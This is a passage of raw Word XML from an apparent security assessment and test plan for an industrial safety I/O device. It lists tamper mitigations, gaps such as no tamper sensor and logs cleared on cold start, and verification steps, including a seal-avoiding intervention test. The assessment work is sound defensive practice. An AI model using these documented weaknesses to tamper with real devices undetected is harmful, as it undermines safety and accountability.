        </w:rPr>
        <w:t xml:space="preserve">, CR 3.9, </w:t>
      </w:r>
      <w:r w:rsidR="00650EDB" w:rsidRPr="00650EDB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EDR 3.11</w:t>
      </w:r>
      <w:r w:rsidR="00DB5DB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, CR 6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF11092" w14:textId="4C1B70E5" w:rsidR="009C0A46" w:rsidRPr="00897779" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="00427EE4" w:rsidRPr="00427EE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G (Physical F-address/OP-mode interface); I (Audit Data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D15735A" w14:textId="74DA1FEB" w:rsidR="009C0A46" w:rsidRDefault="00196EB6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00196EB6">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE: </w:t>
      </w:r>
      <w:r w:rsidR="007F5A7B" w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C0A46" w:rsidRPr="00280EAE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00427EE4" w:rsidRPr="00427EE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Repudiation</w:t>
      </w:r>
      <w:r w:rsidR="00E402AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="0083659A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, Tampering</w:t>
      </w:r>
      <w:r w:rsidR="0093499E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09674BC6" w14:textId="77777777" w:rsidR="00FD05D2" w:rsidRPr="00C025BD" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Function (Mitigation): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B134FB" w14:textId="1A6A809C" w:rsidR="00C025BD" w:rsidRPr="00C025BD" w:rsidRDefault="00C025BD" w:rsidP="00C025BD">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C025BD">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Physical seals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C025BD">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Passive plastic/metal seals (SRIO-11000/11001).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664A6BBB" w14:textId="5CDF86AA" w:rsidR="00C025BD" w:rsidRPr="00C025BD" w:rsidRDefault="00C025BD" w:rsidP="00C025BD">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C025BD">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rotary switch read only at Init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C025BD">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Runtime change ignored (SRIO-10812).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5013CA03" w14:textId="297771A6" w:rsidR="00C025BD" w:rsidRPr="00C025BD" w:rsidRDefault="00C025BD" w:rsidP="00C025BD">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C025BD">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I&amp;M0 REVISION_COUNTER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C025BD">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Increments on each parameter change (I&amp;M0, SRIO-3002).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2239B034" w14:textId="2FFE9882" w:rsidR="00C025BD" w:rsidRPr="00C025BD" w:rsidRDefault="00C025BD" w:rsidP="00C025BD">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C025BD">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I&amp;M4 signature</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C025BD">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> F_iParCRC + F_Par_CRC fingerprint of the loaded configuration (SRIO-3011).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3670A63A" w14:textId="3EDCB6B6" w:rsidR="006901C7" w:rsidRPr="00C025BD" w:rsidRDefault="00C025BD" w:rsidP="00C025BD">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C025BD">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>COM Error Log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C025BD">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ErrorEvents incl. SCPU-timeout (SRIO-10665/21357</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B894EC" w14:textId="77777777" w:rsidR="00D8789A" w:rsidRPr="00D8789A" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707507F5" w14:textId="14542DE3" w:rsidR="00D8789A" w:rsidRPr="00D8789A" w:rsidRDefault="00D0445A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0445A">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-1</w:t>
      </w:r>
      <w:r w:rsidR="00BF222D">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0445A">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> No tamper switch/sensor → EDR 3.11 detection limb unmet. An intervention avoiding visible seal damage is unrecorded and unattributable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB04D0E" w14:textId="77777777" w:rsidR="001F6E4C" w:rsidRDefault="00D0445A" w:rsidP="001F6E4C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F6E4C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-2</w:t>
      </w:r>
      <w:r w:rsidR="00BF222D" w:rsidRPr="001F6E4C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F6E4C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Even the events the device does log carry no absolute timestamp</w:t>
      </w:r>
      <w:r w:rsidR="00410B9F" w:rsidRPr="001F6E4C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001F6E4C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> only uptime that resets on cold start</w:t>
      </w:r>
      <w:r w:rsidR="007075F6" w:rsidRPr="001F6E4C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007075F6" w:rsidRPr="001F6E4C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(SRIO-15218/15398).</w:t>
      </w:r>
      <w:r w:rsidRPr="001F6E4C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="001F6E4C" w:rsidRPr="001F6E4C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-003 evidence is therefore not time-referenceable; a cold start both clears and de-times the record.</w:t>
      </w:r>
      <w:r w:rsidR="001F6E4C" w:rsidRPr="001F6E4C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C7D2DF" w14:textId="635A2D15" w:rsidR="009C0A46" w:rsidRPr="001F6E4C" w:rsidRDefault="00410B9F" w:rsidP="001F6E4C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F6E4C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-3</w:t>
      </w:r>
      <w:r w:rsidR="00BF222D" w:rsidRPr="001F6E4C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F6E4C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A3415" w:rsidRPr="000A3415">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The store is non-safety (QM), circular, cleared on cold start (SRIO-10663/6521) </w:t>
      </w:r>
      <w:r w:rsidR="000A3415" w:rsidRPr="000A3415">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="000A3415" w:rsidRPr="000A3415">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> fails CR 2.9/3.9 and cannot be ‘retained for the mandated period.’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AC792C" w14:textId="4ACB4D3E" w:rsidR="00410B9F" w:rsidRPr="00E35956" w:rsidRDefault="00410B9F" w:rsidP="00E35956">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00410B9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-4</w:t>
      </w:r>
      <w:r w:rsidR="000A3415">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="007075F6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00410B9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00166470" w:rsidRPr="00166470">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fusing is a valid EDR 2.13 exclusion, but a physical re-probe still yields no log entry, so RQ-003’s ‘evidence of any intervention’ remains unmet at this interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF9B291" w14:textId="77777777" w:rsidR="00CA2AAB" w:rsidRDefault="00CA2AAB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F41F518" w14:textId="77777777" w:rsidR="00CA2AAB" w:rsidRPr="00DA402C" w:rsidRDefault="00CA2AAB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F15A54"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CA2AAB" w14:paraId="74899EA1"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7B0B31" w14:textId="77777777" w:rsidR="00CA2AAB" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35692853"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1E3CC39C"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1C28E7C7"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6850884B"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CA2AAB" w:rsidRPr="007F5798" w14:paraId="1F3DFD9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E976A37" w14:textId="77777777" w:rsidR="00CA2AAB" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4FF42B51" w14:textId="77777777" w:rsidR="00634DFD"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34DFD">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Enumerate the evidence that exists: read COM Error Log (IoT-Core); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71D2B730" w14:textId="7F7894DF" w:rsidR="00CA2AAB" w:rsidRPr="00D1454A"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34DFD">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>confirm REVISION_COUNTER increments; read I&amp;M4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BCAAC44" w14:textId="5F8BD9F3" w:rsidR="00CA2AAB" w:rsidRPr="00205565" w:rsidRDefault="004E1331"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205565">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Functional baseline of the partial controls (CR 6.1 met; CR 2.8 partial)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="693F820B" w14:textId="3B149BA1" w:rsidR="00CA2AAB" w:rsidRPr="00205565"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sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00205565">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Requirements-based verification; NIST SP 800-115 §3.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="446CDBED" w14:textId="379D8278" w:rsidR="00CA2AAB" w:rsidRPr="001B7D54"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1B7D54">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA2AAB" w:rsidRPr="00D258C9" w14:paraId="1E10CDF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2835A827" w14:textId="77777777" w:rsidR="00CA2AAB" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A5D4E44" w14:textId="77777777" w:rsidR="00674E1C"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74E1C">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Perform an authorised address/parameter change + reboot; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D80990A" w14:textId="5B6059AE" w:rsidR="00CA2AAB" w:rsidRPr="00D1454A"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74E1C">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>check for any retained, time-stamped evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="397BE94D" w14:textId="634A3976" w:rsidR="00CA2AAB" w:rsidRPr="000D547F" w:rsidRDefault="00F53F54"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0D547F">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Effectiveness (or not) of the evidence function under normal use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61B2128D" w14:textId="6548EE4B" w:rsidR="00CA2AAB" w:rsidRPr="000D547F" w:rsidRDefault="006963F2"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0D547F">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Threat-mitigation verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="077E946D" w14:textId="11810BC5" w:rsidR="00CA2AAB" w:rsidRPr="000D547F" w:rsidRDefault="00CE5463"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0D547F">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA2AAB" w:rsidRPr="00D0764E" w14:paraId="35EE80F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BAA207" w14:textId="77777777" w:rsidR="00CA2AAB" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="713228E2" w14:textId="77777777" w:rsidR="00731639"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31639">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Illegitimate intervention avoiding visible seal damage (careful sleeve </w:t>
            </w:r>
            <w:r w:rsidRPr="00731639">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">removal, rotary change incl. →999), reboot; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63E68E7A" w14:textId="2E9DA791" w:rsidR="00CA2AAB" w:rsidRPr="00D1454A"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31639">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>verify no tamper record + cold start clears log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EF4D768" w14:textId="67E3CFF1" w:rsidR="00CA2AAB" w:rsidRPr="00B64145" w:rsidRDefault="008869E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B64145">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Proves G-1 &amp; G-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7473B92A" w14:textId="1906CB69" w:rsidR="007F0446"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61DAB">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK for ICS T0872;</w:t>
            </w:r>
            <w:r w:rsidRPr="004E086B">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED6B61">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>OWASP ISTG-PHY;</w:t>
            </w:r>
            <w:r w:rsidRPr="004E086B">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31F878A3" w14:textId="29AD3269" w:rsidR="00CA2AAB" w:rsidRPr="00984051"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984051">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>EDR 3.11 detection limb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2438E679" w14:textId="09FEFDAE" w:rsidR="00CA2AAB" w:rsidRPr="004279CE" w:rsidRDefault="00DD465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279CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">SVV-4 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA2AAB" w:rsidRPr="00035F89" w14:paraId="2B7FAAF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9D5F80B" w14:textId="77777777" w:rsidR="00CA2AAB" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FE58B96" w14:textId="77777777" w:rsidR="004E626E" w:rsidRPr="004E626E"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E626E">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Time-attribution analysis: capture two events across a cold start; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40998AF3" w14:textId="6759ECFD" w:rsidR="00CA2AAB" w:rsidRPr="00D1454A"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E626E">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>show uptime resets and no absolute time exists</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
